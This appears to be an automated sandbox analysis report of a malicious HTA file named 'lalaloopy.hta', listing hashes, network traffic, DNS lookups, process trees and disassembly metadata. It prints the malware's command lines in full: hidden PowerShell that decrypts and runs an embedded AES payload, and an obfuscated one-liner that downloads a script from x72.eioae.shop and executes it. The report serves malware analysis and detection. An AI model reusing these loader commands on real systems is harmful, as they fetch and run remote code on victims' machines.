                            SHA-512:DE97FE3D5316AF33DF9B06E524E23CDD54C93A37FD79F4759904962E18170B2C12A2D43D39865C694AE7468067C7044E9928D17CA94B417209FA1A5F4DD71FFF
                            Malicious:false
                            Preview:...................................FL..................F.".. ...J.S.....}.T...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...5.Zp......u.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2jZn............................^.A.p.p.D.a.t.a...B.V.1.....jZp...Roaming.@......EW<2jZp...../......................}.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2jZn.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....gZ.k..Windows.@......EW<2jZn.....2........................W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2jZn.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2jZn.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2gZ.j....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2EWk3....u...........

                            Static File Info

                            General

                            File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                            Entropy (8bit):5.176266057098453
                            TrID:
                            • HTML Application (8008/1) 100.00%
                            File name:lalaloopy.hta
                            File size:88'446 bytes
                            MD5:37e8f69d73e92577d78e2c4f5ccd5d19
                            SHA1:920cfae3eace232359210e6c6f685570437572ff
                            SHA256:c736d44134d6e443706c1db36bd6b37981f57a47ba2c45a3dc0457f17c63f237
                            SHA512:c124ca2a28be5d19e99a4b9523008790b9a2c862c066395b1049c16a2bcc62d627510feb920fce9fe3f2517c7a917ff43361148346b87bd0da7bd453a431367e
                            SSDEEP:1536:G+pb7wSe49CTkY+paTG1/rKboHVx+2RBMyrk0:GuHwSe49CTkY+kODKbEDk0
                            TLSH:BA83A3902D91E6258963AC01C572E25EAECE4C093BEEE8518FEE75EC19047DD4E39F34
                            File Content Preview:<script>window.moveTo(1,9999)</script><script>window.onerror = function(){return true}</script><script>+ msrxpbs ] <= while ( 74 void 26 jeuahep void ] rcibt - 71 76 48 ) == != isvalq while 37 = 11 ] 9 74 class euk class 24 return 34 ahukq [ string [ 75 i

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Mar 10, 2025 17:35:43.969072104 CET49687443192.168.2.6172.67.173.214
                            Mar 10, 2025 17:35:43.969120979 CET44349687172.67.173.214192.168.2.6
                            Mar 10, 2025 17:35:43.969198942 CET49687443192.168.2.6172.67.173.214
                            Mar 10, 2025 17:35:43.981359005 CET49687443192.168.2.6172.67.173.214
                            Mar 10, 2025 17:35:43.981380939 CET44349687172.67.173.214192.168.2.6
                            Mar 10, 2025 17:35:45.642951012 CET44349687172.67.173.214192.168.2.6
                            Mar 10, 2025 17:35:45.643038034 CET49687443192.168.2.6172.67.173.214
                            Mar 10, 2025 17:35:45.670572042 CET49687443192.168.2.6172.67.173.214
                            Mar 10, 2025 17:35:45.670607090 CET44349687172.67.173.214192.168.2.6
                            Mar 10, 2025 17:35:45.670960903 CET44349687172.67.173.214192.168.2.6
                            Mar 10, 2025 17:35:45.693562031 CET49687443192.168.2.6172.67.173.214
                            Mar 10, 2025 17:35:45.740329027 CET44349687172.67.173.214192.168.2.6
                            Mar 10, 2025 17:35:46.468648911 CET44349687172.67.173.214192.168.2.6
                            Mar 10, 2025 17:35:46.468733072 CET44349687172.67.173.214192.168.2.6
                            Mar 10, 2025 17:35:46.468808889 CET49687443192.168.2.6172.67.173.214
                            Mar 10, 2025 17:35:46.477437973 CET49687443192.168.2.6172.67.173.214
                            Mar 10, 2025 17:36:00.711536884 CET5594853192.168.2.61.1.1.1
                            Mar 10, 2025 17:36:00.716690063 CET53559481.1.1.1192.168.2.6
                            Mar 10, 2025 17:36:00.716839075 CET5594853192.168.2.61.1.1.1
                            Mar 10, 2025 17:36:00.721869946 CET53559481.1.1.1192.168.2.6
                            Mar 10, 2025 17:36:01.199019909 CET5594853192.168.2.61.1.1.1
                            Mar 10, 2025 17:36:01.204948902 CET53559481.1.1.1192.168.2.6
                            Mar 10, 2025 17:36:01.205053091 CET5594853192.168.2.61.1.1.1

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Mar 10, 2025 17:35:43.947900057 CET6300053192.168.2.61.1.1.1
                            Mar 10, 2025 17:35:43.963355064 CET53630001.1.1.1192.168.2.6
                            Mar 10, 2025 17:36:00.710957050 CET53500171.1.1.1192.168.2.6

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 10, 2025 17:35:43.947900057 CET192.168.2.61.1.1.10x2e83Standard query (0)x72.eioae.shopA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 10, 2025 17:35:43.963355064 CET1.1.1.1192.168.2.60x2e83No error (0)x72.eioae.shop172.67.173.214A (IP address)IN (0x0001)false
                            Mar 10, 2025 17:35:43.963355064 CET1.1.1.1192.168.2.60x2e83No error (0)x72.eioae.shop104.21.40.9A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • x72.eioae.shop

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.649687172.67.173.214443564C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            2025-03-10 16:35:45 UTC116OUTGET /413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll HTTP/1.1
                            Host: x72.eioae.shop
                            Connection: Keep-Alive
                            2025-03-10 16:35:46 UTC1061INHTTP/1.1 404 Not Found
                            Date: Mon, 10 Mar 2025 16:35:46 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 191
                            Connection: close
                            X-Powered-By: Express
                            Content-Security-Policy: default-src 'none'
                            X-Content-Type-Options: nosniff
                            Set-Cookie: connect.sid=s%3AEGlKEJFr08qFjFo4btUm5-Lb9kzuQn1t.NwuQgd8tK6F%2FpRmEZYs7XSDxFf3Wqec6%2BlK0S7X87uU; Path=/; HttpOnly
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oM71qvLVRJqkuajHY3kH6i478HYgU%2FywtxKamo9BLNJkKXFUYjytKqnISDmK2KSPrR1%2F4yTCYX3T6YmQUmVZssQ1qVPvHa3gybUvgCnhCppEkg%2FMlHJ0GA2ArSvLHw8fhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            speculation-rules: "/cdn-cgi/speculation"
                            Server: cloudflare
                            CF-RAY: 91e43a23e8046b15-DFW
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=7787&min_rtt=7090&rtt_var=2616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=730&delivery_rate=407944&cwnd=204&unsent_bytes=0&cid=39929fb1b7f4b80d&ts=828&x=0"
                            2025-03-10 16:35:46 UTC191INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 34 31 33 61 34 32 61 34 63 37 31 35 36 39 33 63 33 37 65 35 32 35 36 65 31 34 34 66 64 37 36 63 63 35 31 31 36 30 62 37 34 36 31 37 30 32 34 64 2e 78 6c 6c 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll</pre></body></html>


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:12:35:38
                            Start date:10/03/2025
                            Path:C:\Windows\SysWOW64\mshta.exe
                            Wow64 process (32bit):true
                            Commandline:mshta.exe "C:\Users\user\Desktop\lalaloopy.hta"
                            Imagebase:0x1c0000
                            File size:13'312 bytes
                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:1
                            Start time:12:35:39
                            Start date:10/03/2025
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3)
                            Imagebase:0x990000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:2
                            Start time:12:35:39
                            Start date:10/03/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff68dae0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:12:35:42
                            Start date:10/03/2025
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'')
                            Imagebase:0x990000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:12:35:42
                            Start date:10/03/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff68dae0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Disassembly

                            Reset < >

                              Executed Functions

                              Function 06561000 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000003.1266331520.0000000006561000.00000010.00000800.00020000.00000000.sdmp, Offset: 06561000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_3_6561000_mshta.jbxd
                              Similarity
                              • API ID:
                              • String ID: !
                              • API String ID: 0-2657877971
                              • Opcode ID: 5b43d84bb5c4d7899a52207a66cb79d2daf89d769651f8cc005f319c6a82a9ed
                              • Instruction ID: 26202600d26b46d367fb087a26cd2ffc908899daf69d70859811c7167beb50fc
                              • Opcode Fuzzy Hash: 5b43d84bb5c4d7899a52207a66cb79d2daf89d769651f8cc005f319c6a82a9ed
                              • Instruction Fuzzy Hash: C8410334B047049FEBF08A9EC881779B7D6FB98350F404569FA569B381C3709C55CAE2
                              Function 064D0FC7 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000003.1266361342.00000000064D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_3_64d0000_mshta.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                              • Instruction ID: 841a2c1b10d3bac56eff3fb79631d6e91e41c4deb1884667098884e9bf5b4f5f
                              • Opcode Fuzzy Hash: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                              • Instruction Fuzzy Hash:
                              Function 064D0FE7 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000003.1266361342.00000000064D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_3_64d0000_mshta.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                              • Instruction ID: 841a2c1b10d3bac56eff3fb79631d6e91e41c4deb1884667098884e9bf5b4f5f
                              • Opcode Fuzzy Hash: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                              • Instruction Fuzzy Hash:
                              Function 064D0FAF Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000003.1266361342.00000000064D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_3_64d0000_mshta.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                              • Instruction ID: 841a2c1b10d3bac56eff3fb79631d6e91e41c4deb1884667098884e9bf5b4f5f
                              • Opcode Fuzzy Hash: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                              • Instruction Fuzzy Hash:
                              Function 064D0FB7 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000003.1266361342.00000000064D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_3_64d0000_mshta.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                              • Instruction ID: 841a2c1b10d3bac56eff3fb79631d6e91e41c4deb1884667098884e9bf5b4f5f
                              • Opcode Fuzzy Hash: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                              • Instruction Fuzzy Hash:

                              Executed Functions

                              Function 04968C18 Relevance: 1.9, Strings: 1, Instructions: 669COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1292146707.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_4960000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID: {Bn^
                              • API String ID: 0-2984447394
                              • Opcode ID: 943f1d232ce542d93f3c83ac1c2d68c1bc883ded507bc490e570a759793bcab0
                              • Instruction ID: 171769adcdcfe7a8c240d889c39c41d26ae05640e9839c3f86ab2a23358802c0
                              • Opcode Fuzzy Hash: 943f1d232ce542d93f3c83ac1c2d68c1bc883ded507bc490e570a759793bcab0
                              • Instruction Fuzzy Hash: F5525C34B00214DFDB14DB68D854B6DBBB2AF89300F1585E9D84AAB3A1DF35AD81CF51
                              Function 04963870 Relevance: .4, Instructions: 371COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1292146707.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_4960000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e9a3ab695edc899d3935fd8f9f293cfbfb12639cf6dbdf90c8ad314fd09bc829
                              • Instruction ID: 066839443cc44c094a17052c8c06d5d80ee030e175241f2f1e0ff550a159ce89
                              • Opcode Fuzzy Hash: e9a3ab695edc899d3935fd8f9f293cfbfb12639cf6dbdf90c8ad314fd09bc829
                              • Instruction Fuzzy Hash: 6FE14B34A01218EFCB15CF98D484AADFBB2FF89310F158566E84AAB351C735ED85CB90
                              Function 04962FF0 Relevance: .2, Instructions: 249COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1292146707.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_4960000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7a060a22e850b7445bc35b7dcebde5fb38044dda3621ac157074d6d0aafd7e69
                              • Instruction ID: 5afa88484e2db42dfe2c01e9016709e45f71d21979531e50c89520b1344e105b
                              • Opcode Fuzzy Hash: 7a060a22e850b7445bc35b7dcebde5fb38044dda3621ac157074d6d0aafd7e69
                              • Instruction Fuzzy Hash: A6A18C74A002059FCB15CF9DC4949AAFBF2FF88314B248569E916AB3A5C735FC51CBA0
                              Function 04968C0A Relevance: .1, Instructions: 141COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1292146707.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_4960000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5052c9152098fcc10275c2d8a7a4163a7fae4087835ffe21acf4da12fd9322a1
                              • Instruction ID: 6e8727d705c52d493f029a3a07f81e92cd34bc037523a1ce159636c1220a376f
                              • Opcode Fuzzy Hash: 5052c9152098fcc10275c2d8a7a4163a7fae4087835ffe21acf4da12fd9322a1
                              • Instruction Fuzzy Hash: E7517930B00214DFDB24DF68D854BADBBB6EF88310F1185AAE546AB391DB71AD41CF91
                              Function 04963100 Relevance: .1, Instructions: 110COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1292146707.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_4960000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fd4e34fde05c4a83b19250e7a3b98d800fa57c78e4e1091c3e23776cee1d278d
                              • Instruction ID: accdae8684a205aec4c9e47a60df4a44f79020fc68d1f987eb9a1abbba8bef27
                              • Opcode Fuzzy Hash: fd4e34fde05c4a83b19250e7a3b98d800fa57c78e4e1091c3e23776cee1d278d
                              • Instruction Fuzzy Hash: 11413974A005059FCB15CF99C498DAAFBB1FF48310B118669D816AB364C735FD90CFA4
                              Function 04963835 Relevance: .1, Instructions: 104COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1292146707.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_4960000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 385014bfb33dd5b9fa2a19d5e873a78977f51a217da9150c62c6f16727803ed2
                              • Instruction ID: ffa9f6af238898fb8aa29f386141628f4375102f9ed659490994ee74f7fb09eb
                              • Opcode Fuzzy Hash: 385014bfb33dd5b9fa2a19d5e873a78977f51a217da9150c62c6f16727803ed2
                              • Instruction Fuzzy Hash: 0731B234A042459FCB11CF98C8909EAFFB1FF4A310B1542A6D94AEB762C735BD41CBA1
                              Function 04963840 Relevance: .1, Instructions: 85COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1292146707.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_4960000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 502e98c1b93bb964b3b34c88a7334b088e9c036c41218ec8e3a2026e240037a3
                              • Instruction ID: 085b73992951a7434b2fb7d3a3e1259a5eb83cc3465a026d2dd2d91ce1e30315
                              • Opcode Fuzzy Hash: 502e98c1b93bb964b3b34c88a7334b088e9c036c41218ec8e3a2026e240037a3
                              • Instruction Fuzzy Hash: A7318F74A042199FCB11CF98D8909AAFBB1FF49310B1581A6E94AEB761C735FD40CBA1
                              Function 04963850 Relevance: .1, Instructions: 79COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1292146707.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_4960000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ebef6a4ffff349cc85f48f5f9297e12699e7d814a3413c2b4fdf59aa237caa89
                              • Instruction ID: 27f1feb7b546d9c78b1f520f5c950f2369cdc51fcbf376ab27025f42843d9979
                              • Opcode Fuzzy Hash: ebef6a4ffff349cc85f48f5f9297e12699e7d814a3413c2b4fdf59aa237caa89
                              • Instruction Fuzzy Hash: E8317C74A042199FCB11CF98D8909AAFBF1FF49310B1581A6E949EB761C735FC40CBA0
                              Function 02B1D006 Relevance: .0, Instructions: 47COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1291099957.0000000002B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_2b1d000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5e72e4d42077e2982631e26dfd541a05b238295662441e5790299b915c0e2e03
                              • Instruction ID: 9ebbacb4ec47f143c6a848374cd4d3938e086a265f6ff301e81c1c16ae3c1ed5
                              • Opcode Fuzzy Hash: 5e72e4d42077e2982631e26dfd541a05b238295662441e5790299b915c0e2e03
                              • Instruction Fuzzy Hash: 23015E7240D3C09FD7524B258D98752BFA4EF53224F5980DBE9888F2A3D2689C45CBB2
                              Function 02B1D01D Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1291099957.0000000002B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_2b1d000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 93a4625b29ed2233bd8bb51ee4aaf5f7dcc3cbf29e7c465bcad3b0d9bc5bbcab
                              • Instruction ID: bba7cb9715100693967c1c0de3a2b93b4b9deb3a833c95a4cbb27decb1c0bff9
                              • Opcode Fuzzy Hash: 93a4625b29ed2233bd8bb51ee4aaf5f7dcc3cbf29e7c465bcad3b0d9bc5bbcab
                              • Instruction Fuzzy Hash: 3A012631504341AFE7109A29DCC8B67FF88DF81724F58C09AED895B282C3789841CBB5
                              Function 049696B8 Relevance: .0, Instructions: 27COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1292146707.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_4960000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6a3a4b5b4fa08b0dbd79a4c2af7d8d8d1a028356b625fa89cbd7e591eed56f47
                              • Instruction ID: 1193af62d405b6d26b35cdd21a768ce367e81eab90da74243b9caf3298993848
                              • Opcode Fuzzy Hash: 6a3a4b5b4fa08b0dbd79a4c2af7d8d8d1a028356b625fa89cbd7e591eed56f47
                              • Instruction Fuzzy Hash: C7F015B9D0430A9FCF44DFB890410BEBBF0AB08210B00886AD819E7340E63496028F96
                              Function 049696C8 Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1292146707.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_4960000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 62d5534ca39884fa90b86a51bb39cad87a9fbf22fc31182ddf022ba48d533c1d
                              • Instruction ID: da4377e3e6ff4949aeafab04d362f7dfa52f0fcf1e09925f355c2edb478c9a07
                              • Opcode Fuzzy Hash: 62d5534ca39884fa90b86a51bb39cad87a9fbf22fc31182ddf022ba48d533c1d
                              • Instruction Fuzzy Hash: EBE002B4E0420A9F8F48DFA995421BEBBF5AB48201F14896E981AE7340E63456118F95
                              Function 0496968A Relevance: .0, Instructions: 13COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1292146707.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_4960000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7990b249793ca224cf57faf5b0c0f6a17ecea4a80a1d486b8dbd42bf0706de3d
                              • Instruction ID: e24c08815a492b6648d9ebec95297d1018095a0e81c01e1251047e2727099852
                              • Opcode Fuzzy Hash: 7990b249793ca224cf57faf5b0c0f6a17ecea4a80a1d486b8dbd42bf0706de3d
                              • Instruction Fuzzy Hash: E4D0A9A100C384A6E3104BA8F10D3A53F288B10208F8804AB924A85882DA3BB0E18AE2

                              Executed Functions

                              Function 077100F0 Relevance: 5.3, Strings: 4, Instructions: 258COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1330070766.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_7710000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID: r2k$r2k$(k$(k
                              • API String ID: 0-705174393
                              • Opcode ID: 27a8883a1f85ddd4e44c0a5296a440e7ef70df30106b1ec1153be4c30d41b9fe
                              • Instruction ID: 0e08d8348eeddbc1fc0a17140a4da93788e5ae87e73c067eca281ba8fc2b58fa
                              • Opcode Fuzzy Hash: 27a8883a1f85ddd4e44c0a5296a440e7ef70df30106b1ec1153be4c30d41b9fe
                              • Instruction Fuzzy Hash: 948139B5705346CFCB159B7C84106AEBBF2AFC6390F2584BBD484DB251DA3489C6C7A1
                              Function 077100D1 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                              Download Yara Rule
                              Strings
